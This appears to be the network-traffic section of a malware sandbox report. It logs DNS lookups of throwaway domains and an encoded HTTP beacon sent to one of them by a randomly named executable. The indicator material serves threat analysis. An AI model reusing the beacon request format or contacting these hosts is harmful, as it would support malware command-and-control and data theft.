Oct 23, 2024 07:03:29.061533928 CEST  80  59653  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:29.881151915 CEST  80  59653  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:29.881217003 CEST  80  59653  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:29.881279945 CEST  59653  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:30.006243944 CEST  80  59653  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:30.006330013 CEST  59653  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:30.565431118 CEST  59653  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:31.583619118 CEST  59654  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:31.589293003 CEST  80  59654  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:31.589482069 CEST  59654  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:31.605112076 CEST  59654  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:31.611628056 CEST  80  59654  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:31.612133980 CEST  80  59654  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:32.440136909 CEST  80  59654  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:32.440164089 CEST  80  59654  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:32.440366030 CEST  59654  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:32.573184967 CEST  80  59654  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:32.573275089 CEST  59654  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:33.134217024 CEST  59654  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:34.151103973 CEST  59655  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:34.156831980 CEST  80  59655  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:34.156924009 CEST  59655  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:34.163798094 CEST  59655  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:34.169210911 CEST  80  59655  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:35.010540962 CEST  80  59655  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:35.010569096 CEST  80  59655  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:35.010587931 CEST  80  59655  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:35.010761976 CEST  59655  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:35.133949995 CEST  80  59655  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:35.134099007 CEST  59655  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:35.137161016 CEST  59655  80  192.168.2.7  161.97.168.245
Oct 23, 2024 07:03:35.142540932 CEST  80  59655  161.97.168.245  192.168.2.7
Oct 23, 2024 07:03:40.726480007 CEST  59656  80  192.168.2.7  154.23.184.240
Oct 23, 2024 07:03:40.733433962 CEST  80  59656  154.23.184.240  192.168.2.7
Oct 23, 2024 07:03:40.733513117 CEST  59656  80  192.168.2.7  154.23.184.240
Oct 23, 2024 07:03:40.743078947 CEST  59656  80  192.168.2.7  154.23.184.240
Oct 23, 2024 07:03:40.750686884 CEST  80  59656  154.23.184.240  192.168.2.7
Oct 23, 2024 07:03:41.684956074 CEST  80  59656  154.23.184.240  192.168.2.7
Oct 23, 2024 07:03:41.737445116 CEST  59656  80  192.168.2.7  154.23.184.240
Oct 23, 2024 07:03:41.867372990 CEST  80  59656  154.23.184.240  192.168.2.7
Oct 23, 2024 07:03:41.867465973 CEST  59656  80  192.168.2.7  154.23.184.240
Oct 23, 2024 07:03:42.252964973 CEST  59656  80  192.168.2.7  154.23.184.240
Oct 23, 2024 07:03:43.272851944 CEST  59657  80  192.168.2.7  154.23.184.240
Oct 23, 2024 07:03:43.278438091 CEST  80  59657  154.23.184.240  192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:43.278529882 CEST5965780192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:43.288655996 CEST5965780192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:43.294064999 CEST8059657154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:44.790514946 CEST8059657154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:44.799856901 CEST5965780192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:45.818010092 CEST5965880192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:45.823393106 CEST8059658154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:45.823473930 CEST5965880192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:45.835012913 CEST5965880192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:45.840545893 CEST8059658154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:45.840729952 CEST8059658154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:47.346669912 CEST8059658154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:47.347467899 CEST5965880192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:47.347467899 CEST5965880192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:48.366044998 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:48.371428967 CEST8059659154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:48.374648094 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:48.380656958 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:48.393368006 CEST8059659154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:50.333424091 CEST8059659154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:50.377966881 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:50.515960932 CEST8059659154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:50.518076897 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:50.522257090 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:50.527626038 CEST8059659154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:55.795898914 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:55.801373005 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:55.801459074 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:55.909245014 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:55.914613962 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.709750891 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.709811926 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.709844112 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.709964037 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:56.709974051 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.710086107 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:56.861812115 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.862090111 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:57.424999952 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:58.443101883 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:58.448621035 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:58.450650930 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:58.459850073 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:58.465255976 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.356173992 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.356195927 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.356205940 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.356343031 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.356558084 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:59.507597923 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.507668018 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:59.971817970 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:00.994266033 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:01.000231981 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.002376080 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:01.014044046 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:01.019471884 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.019664049 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.911946058 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.912000895 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.912018061 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.912055969 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:01.912144899 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.912209988 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:02.063843012 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:02.063910007 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:02.518699884 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:03.536848068 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:03.542232990 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:03.542314053 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:03.548465967 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:03.553755045 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.447998047 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448009014 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448021889 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448194981 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448203087 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448317051 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448343992 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.448343992 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.448458910 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448467970 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448476076 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448484898 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448539972 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.448539972 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.600486994 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.604207039 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.606128931 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.611398935 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:09.777502060 CEST5966480192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:09.783859015 CEST80596643.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:09.783919096 CEST5966480192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:09.794462919 CEST5966480192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:09.799772978 CEST80596643.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:10.476643085 CEST80596643.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:10.480042934 CEST5966480192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:11.300256014 CEST5966480192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:11.446799994 CEST80596643.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:12.319340944 CEST5966580192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:12.324769974 CEST80596653.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:12.324881077 CEST5966580192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:12.339335918 CEST5966580192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:12.344743967 CEST80596653.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:13.016648054 CEST80596653.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:13.017874956 CEST5966580192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:14.534795046 CEST5966580192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:14.541639090 CEST80596653.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:15.552686930 CEST5966680192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:15.558376074 CEST80596663.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:15.558517933 CEST5966680192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:15.567982912 CEST5966680192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:15.573411942 CEST80596663.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:15.573492050 CEST80596663.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:16.229679108 CEST80596663.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:16.229747057 CEST5966680192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:17.081438065 CEST5966680192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:17.086920023 CEST80596663.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:18.099778891 CEST5966780192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:18.105515003 CEST80596673.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:18.105582952 CEST5966780192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:18.113260984 CEST5966780192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:18.118597031 CEST80596673.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:18.771471977 CEST80596673.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:18.810209036 CEST80596673.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:18.810436010 CEST5966780192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:18.811171055 CEST5966780192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:18.816504002 CEST80596673.33.130.190192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 07:02:08.574106932 CEST | 65072 | 53 | 192.168.2.7 | 1.1.1.1
Oct 23, 2024 07:02:08.588857889 CEST | 53 | 65072 | 1.1.1.1 | 192.168.2.7
Oct 23, 2024 07:02:11.065826893 CEST | 63669 | 53 | 192.168.2.7 | 1.1.1.1
Oct 23, 2024 07:02:11.092874050 CEST | 53 | 63669 | 1.1.1.1 | 192.168.2.7
Oct 23, 2024 07:02:16.716217041 CEST | 59276 | 53 | 192.168.2.7 | 1.1.1.1
Oct 23, 2024 07:02:16.743635893 CEST | 53 | 59276 | 1.1.1.1 | 192.168.2.7
Oct 23, 2024 07:02:49.106076956 CEST | 62053 | 53 | 192.168.2.7 | 1.1.1.1
Oct 23, 2024 07:02:49.131774902 CEST | 53 | 62053 | 1.1.1.1 | 192.168.2.7
Oct 23, 2024 07:02:49.431941032 CEST | 53 | 54536 | 162.159.36.2 | 192.168.2.7
Oct 23, 2024 07:02:50.070867062 CEST | 59460 | 53 | 192.168.2.7 | 1.1.1.1
Oct 23, 2024 07:02:50.079823971 CEST | 53 | 59460 | 1.1.1.1 | 192.168.2.7
Oct 23, 2024 07:03:04.896378994 CEST | 56093 | 53 | 192.168.2.7 | 1.1.1.1
Oct 23, 2024 07:03:05.295717001 CEST | 53 | 56093 | 1.1.1.1 | 192.168.2.7
Oct 23, 2024 07:03:26.462376118 CEST | 53745 | 53 | 192.168.2.7 | 1.1.1.1
Oct 23, 2024 07:03:26.487673998 CEST | 53 | 53745 | 1.1.1.1 | 192.168.2.7
Oct 23, 2024 07:03:40.146703005 CEST | 63243 | 53 | 192.168.2.7 | 1.1.1.1
Oct 23, 2024 07:03:40.723815918 CEST | 53 | 63243 | 1.1.1.1 | 192.168.2.7
Oct 23, 2024 07:03:55.538084984 CEST | 49386 | 53 | 192.168.2.7 | 1.1.1.1
Oct 23, 2024 07:03:55.793108940 CEST | 53 | 49386 | 1.1.1.1 | 192.168.2.7
Oct 23, 2024 07:04:09.615719080 CEST | 50833 | 53 | 192.168.2.7 | 1.1.1.1
Oct 23, 2024 07:04:09.775509119 CEST | 53 | 50833 | 1.1.1.1 | 192.168.2.7
Oct 23, 2024 07:04:23.819137096 CEST | 57401 | 53 | 192.168.2.7 | 1.1.1.1
Oct 23, 2024 07:04:24.374213934 CEST | 53 | 57401 | 1.1.1.1 | 192.168.2.7
                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                        Oct 23, 2024 07:02:08.574106932 CEST192.168.2.71.1.1.10xd63aStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.065826893 CEST192.168.2.71.1.1.10x8bfcStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.716217041 CEST192.168.2.71.1.1.10x240dStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:49.106076956 CEST192.168.2.71.1.1.10xef69Standard query (0)www.joshcharlesfitness.xyzA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:50.070867062 CEST192.168.2.71.1.1.10x60f9Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:04.896378994 CEST192.168.2.71.1.1.10xbfd3Standard query (0)www.facaicloud.topA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:26.462376118 CEST192.168.2.71.1.1.10xebeStandard query (0)www.98080753.xyzA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:40.146703005 CEST192.168.2.71.1.1.10x5c57Standard query (0)www.wcp58.topA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:55.538084984 CEST192.168.2.71.1.1.10xe892Standard query (0)www.cpamerix.onlineA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:09.615719080 CEST192.168.2.71.1.1.10xc31aStandard query (0)www.lotus9.lifeA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:23.819137096 CEST192.168.2.71.1.1.10x80Standard query (0)www.g4s7e5.bizA (IP address)IN (0x0001)false
                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                        Oct 23, 2024 07:02:08.588857889 CEST1.1.1.1192.168.2.70xd63aNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:08.588857889 CEST1.1.1.1192.168.2.70xd63aNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:08.588857889 CEST1.1.1.1192.168.2.70xd63aNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com3.5.3.65A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com52.216.32.73A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com3.5.29.111A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com52.216.178.251A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com3.5.27.158A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com52.216.51.193A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com54.231.200.17A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com52.217.199.249A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com54.231.236.129A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com3.5.29.92A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com54.231.164.225A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.189A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com52.216.147.100A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com52.216.38.233A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com3.5.30.27A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com54.231.129.241A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:49.131774902 CEST1.1.1.1192.168.2.70xef69No error (0)www.joshcharlesfitness.xyzjoshcharlesfitness.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:49.131774902 CEST1.1.1.1192.168.2.70xef69No error (0)joshcharlesfitness.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:49.131774902 CEST1.1.1.1192.168.2.70xef69No error (0)joshcharlesfitness.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:50.079823971 CEST1.1.1.1192.168.2.70x60f9Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:05.295717001 CEST1.1.1.1192.168.2.70xbfd3No error (0)www.facaicloud.top74.48.31.123A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:26.487673998 CEST1.1.1.1192.168.2.70xebeNo error (0)www.98080753.xyz161.97.168.245A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:40.723815918 CEST1.1.1.1192.168.2.70x5c57No error (0)www.wcp58.topwcp58.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:40.723815918 CEST1.1.1.1192.168.2.70x5c57No error (0)wcp58.top154.23.184.240A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:55.793108940 CEST1.1.1.1192.168.2.70xe892No error (0)www.cpamerix.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:09.775509119 CEST1.1.1.1192.168.2.70xc31aNo error (0)www.lotus9.lifelotus9.lifeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:09.775509119 CEST1.1.1.1192.168.2.70xc31aNo error (0)lotus9.life3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:09.775509119 CEST1.1.1.1192.168.2.70xc31aNo error (0)lotus9.life15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:24.374213934 CEST1.1.1.1192.168.2.70x80No error (0)www.g4s7e5.biz203.90.227.88A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49878 | 3.33.130.190 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe

Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:02:49.148719072 CEST | 495 | OUT | GET /f2m8/?fvM8Gh=q8u1m2y9j/W78LyjRjBmLFBPluC1hJa5ZcIT7WbQRmUkJn/aUKn129a9SdOjfVpEuogWIbFDr3wrvEdEbURHbL899LelzoXXcWM6JsFHtDa1nH+G65yTIIp51Lx0C7/dwS8TcymTUlcC&DfDx=AFrxfzcH-Ld HTTP/1.1
Host: www.joshcharlesfitness.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Oct 23, 2024 07:02:49.812549114 CEST | 419 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 23 Oct 2024 05:02:49 GMT
Content-Type: text/html
Content-Length: 279
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fvM8Gh=q8u1m2y9j/W78LyjRjBmLFBPluC1hJa5ZcIT7WbQRmUkJn/aUKn129a9SdOjfVpEuogWIbFDr3wrvEdEbURHbL899LelzoXXcWM6JsFHtDa1nH+G65yTIIp51Lx0C7/dwS8TcymTUlcC&DfDx=AFrxfzcH-Ld"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 59633 | 74.48.31.123 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe

